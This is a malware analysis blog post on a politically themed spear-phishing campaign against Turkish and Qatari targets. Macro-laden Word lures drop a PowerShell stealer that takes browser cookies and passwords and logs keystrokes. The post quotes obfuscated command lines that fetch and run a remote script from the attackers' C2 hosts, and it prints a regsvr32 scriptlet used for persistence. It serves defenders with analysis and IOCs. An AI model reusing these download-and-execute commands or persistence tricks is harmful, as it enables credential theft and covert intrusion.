During our daily threat hunting activities we have come across a tweet reporting an active spear-phishing campaign apparently targeting Turkey. After an initial assessment we decided to investigate further, finding similarities with other campaigns active in the recent past and possibly coming from the same actors.
https://twitter.com/_jsoo_/status/1068045034203697152
Spear-phishing Documents
The spear-phishing documents target Turkish victims and we managed to find another older one targeting victims in Qatar. The documents try to lure people toward the Conference of the association of “Parliamentarians for Al Quds” in Instanbul. The Parlamentarians for Al Quds is a committee that coordinates “the efforts of international parliamentarians to support the Palestine cause“.


Google translator helps non-arabic speakers to make sense of the content crafted for the spear-phishing campaign:

the document is an invitation to the conference to be held from the 13th to the 16th of December with the title “Jerusalem is the eternal capital of Palestine“. No announcement related to this conference is currently published on the official website.
Infection strategy
Both documents follow the same traditional infection strategy: trying to lure the victims into clicking on the “enable content” button to run a malicious macro:

The embedded macro runs a command prompt invoking powershell that in turn runs the .ps1 script downloaded from a malicious host.
We have reconstructed the storyline using ReaQta-Hive:

Winword.exe can be seen to spawn an instance of cmd.exe with a suspicious command-line:
"C:\Windows\System32\cmd.exe" /c " EcHo iEx ( new-oBjeCt sYStem.Io.COmPreSSiON.defLAtEstreAm([system.Io.mEmorYStrEAM] [ConVerT]::fRomBaSE64STRing( 'BcExEkAwEAXQq+hQSHotCg2FgjbWYolNJv6M63uv75asGPirxvViQjYwzMxr44UVpWnDpz64bUISPYr8BGJt7SOUwht2bA7OeNE7klGGdVEsvZQkIi9/') , [sYsTEM.io.compressIOn.CoMpREssiOnmode]::DECOMPRESs )^^^| % {new-oBjeCt io.STreaMreader( $_, [TexT.ENCoDInG]::aSCii )} ).REadtOEnd() | pOwErSheLl -NoeX -nOlo -NOproFiLe -nOnIn -eXeCuTI BypAss -wiNdoWstYL hiDden -"
Deobfuscating the commandline leads to the real parameters passed to powershell.exe:
IEX (New-Object Net.WebClient).DownloadString('http://microsoftdata.linkpc.net/api/cscript')
The way arguments are passed to powershell is interesting as it appears to be a method to evade command-line monitoring:
pOwErSheLl -NoeX -nOlo -NOproFiLe -nOnIn -eXeCuTI BypAss -wiNdoWstYL hiDden -
The argument is “echoed” directly to powershell.exe this is why we don’t see the usual iEx [...]
parameter in the powershell.exe command line.
At this point powershell.exe runs the infection routine leveraging on the script downloaded from `hxxp://microsoftdata[.]linkpc[.]net/api/cscript`, below is an abstract of its content:

The powershell script is used to steal: cookies, sessions, logins from Chrome, Opera and Firefox, additionally has a module for keylogging. The data acquired is then exfiltrated to the following C2 :
hxxp://microsoftdata[.]linkpc[.]net
The script downloads the sqlite DLLs required to interact with browsers’ localdb (analysis window #4), it creates a GlobalMutex Global\rYF1pgeADA
to avoid the execution of multiple instances of the stealer, it initializes the keylogger and cycles the functions needed to capture the information and finally to establish persistence.

Particular attention should be given to the persistence mechanism used: a scheduled task is used to persist a squiblydoo attack:


the following scriptlet will be then executed:
<?XML version="1.0"?>
<scriptlet>
<registration
progid="rYF1pgeADA"
classid="{3cf925ab-14c5-4324-9b5c-bbe294ac03a0}" >
<script language="JScript">
<![CDATA[
p = 'Powershell';
c = ' -WiND hiDdeN -nOproFILe -eXeCUTiON bypaSS -Nol -ComMa "iEx ( new-oBjeCt sYStem.Io.COmPreSSiON.defLAtEstreAm([system.Io.mEmorYStrEAM] [ConVerT]::fRomBaSE64STRing( \'BcExEkAwEAXQq+hQSHotCg2FgjbWYolNJv6M63uv75asGPirxvViQjYwzMxr44UVpWnDpz64bUISPYr8BGJt7SOUwht2bA7OeNE7klGGdVEsvZQkIi9/\') , [sYsTEM.io.compressIOn.CoMpREssiOnmode]::DECOMPRESs )| % {new-oBjeCt io.STreaMreader( $_, [TexT.ENCoDInG]::aSCii )} ).REadtOEnd() "';
r = new ActiveXObject("WScript.Shell").Run(p + c,0,false);
]]>
</script>
</registration>
</scriptlet>
ReaQta-Hive correctly identifies this behavior as anomalous and reconstructs the storyline as reported below:

Stealer Script Capabilities
The script delivered in the spear-phishing campaign, as already mentioned, has the capabilities to steal cookies and login information from the following browsers Google Chrome/Firefox/Opera, keylogging and persistence using a scheduled task which performs a squiblydoo attack. The script accepts custom scripts deployed from the C2, this means its capabilities can be extended at will by the attackers:
We report the list of function signatures below for future reference:
function Set-Key
function Set-EncryptedData
function Uid
function CookiesTo-MYJson ([System.Collections.ArrayList] $ArrayList)
function PasswordsTo-MYJson ([System.Collections.ArrayList] $ArrayList)
function unProtecte ($data)
function ChromeDB
function FirefoxDB
function OperaDB
function Add-SQLite ($link)
function urlPOST($link,$data)
function OperaSESSION ($SQLiteDB,$search,$condition)
function FirefoxSESSION ($SQLiteDB,$search,$condition)
function ChromeSESSION ($SQLiteDB,$search,$condition)
function ChromePASS ($SQLiteDB)
function BrowsersLOGINS
function _sct
function InstallSCT
function BrowsersPS
function BrowsersLOGGER
function InitLOGGER
function BrowsersCOOKIES ($website,$cname)
The keylogger appears to reuse the same code obtained from the following github repository:
https://github.com/lazywinadmin/PowerShell/blob/master/TOOL-Start-KeyLogger/Start-KeyLogger.ps1
C2 infrastructure and previous samples
The C2 presents an interesting pattern, the path of the URL is always: /api/{endpoint}:
http://{$domain}/api/cscript http://{$domain}/api/pscript http://{$domain}/api/logger/submit http://{$domain}/api/chrome/submit http://{$domain}/api/firefox/submit http://{$domain}/api/opera/submit http://{$domain}/assest/sqlite
Thanks to the above information, we have been able to discover additional samples using the same pattern in previous spear-phishing campaigns:
Malicious document targeting #Qatar, impersonates @qcharity
Embedded macros download a PowerShell script from:
4host[.]publicvm[.]com/api/cscript
Steals passwords and cookies from browsers
MD5: 9d6ccae4ef4a206345005e58e51ca6cb pic.twitter.com/Ptrr0iIJi4— Curly Cyber (@CurlyCyber) August 21, 2018
As pointed out at the beginning, this old sample appeared to target victims in Qatar, at that time by posing as Qatar Charity
The document has been first observed at the beginning of August 2018, there are only minor code changes compared to the current one, mainly just slight alterations in behavior, persistence and script’s code:

We’ve uploaded a behavioral analysis on VirusTotal (click on detailed report to access it). In the analysis window #1 we can see that cmd.exe‘s command-line uses no obfuscation:
"C:\Windows\System32\cmd.exe" /C"Echo\IEX (New-Object Net.WebClient).DownloadString('http://4host.publicvm.com/api/cscript') | PowersHell -NOpROfIL -eX BYpAss -NOlOgo -wiNdoWs HiDdEN -noeXIt -noNI -"
For completeness here’s the changes from the previous version of the powershell script used:
Capability | Old Version | New Version |
Persistence | scheduled task (via powershell) | scheduled task (via regsvr32) |
Keylogger | Not found | Present |
Mutex | wfCQnIo2G7 | rYF1pgeADA |
Old panel url:
hxxp://4host[.]publicvm[.]com/

The three documents share a similar metadata structure:
Metadata | Old Version | New Version |
AppVersion | 12.0 | 16.0 |
Author | Mohamed Bennabszllah | Parliament Quds |
CompObjUserType | Document Microsoft Office Word 97-2003 | Document Microsoft Office Word 97-2003 |
CreateDate | 2018:08:05 16:16:00 | 2018:11:21 14:50:00 |
LanguageCode | English (US) | Arabic |
CodePage | Windows Latin 1 (Western European) | Windows Arabic |
LastModifiedBy | DELL | Mohamed Bennabszllah |
LastPrinted | 0000:00:00 00:00:00 | 2018:10:19 17:14:00Z |
ModifyDate | 2018:08:05 16:32:00 | 2018:11:22 12:20:00 |
System | Windows | Windows |
We can observe another similarity, both the domains use to the same Free Dynamic DNS service: DNSExit.


Final words
This attack is interesting because of the potential targets involved but also because of the techniques adopted: usage of system binaries (lolbins) to perform malicious activity via powershell, scheduled task persistence and the “echoing” technique used to hide the commandline and make detection harder. This threat actor appears to be active and the type of documents retrieved presents evidence that these operations are likely to be politically motivated and not the work of a cyber crime gang.
Spear-Phishing remains one of the most effective vectors and even trained personnel can easily become unwanted victims. ReaQta-Hive helps by automatically detecting targeted threats, like the ones just analysed, using Artificial Intelligence and it enables analysts to perform in-depth threat hunting activities and automated discovery of behavioral anomalies. In-memory threats levering on operating system’s components (lolbins) are capable of bypassing traditional and legacy defenses, at the same time leaving a lower forensic footprint, given the absence of a traditional binary payload. Get in touch with us for a live demonstration and to understand how to address similar threats in real-time.
IOCs
1d2bbe3fd9021bbed4667628b86156bee8763b3d93cdac6de398c751a281a324 دعوة.doc bf4d4ee4a8e4472c7968586fa0318e556a89bfd94aeb4e72afd99ab340541770 إستمارة.doc 7a26d5b600a078816beb3a2849827fa7d45ec85ec6c3343b3857f10edfece74c cscript.ps1 hxxp://microsoftdata[.]linkpc[.]net 7c8cf1e3ec35a6f604699f6481f3463e9ae19c93b8efd861b914c8260304d314 qatar.doc hxxp://4host[.]publicvm[.]com Global\rYF1pgeADA mutex Global\wfCQnIo2G7 mutex http://{$domain}/api/cscript http://{$domain}/api/pscript http://{$domain}/api/logger/submit http://{$domain}/api/chrome/submit http://{$domain}/api/firefox/submit http://{$domain}/api/opera/submit http://{$domain}/assest/sqlite rYF1pgeADA scheduled task name wfCQnIo2G7 scheduled task name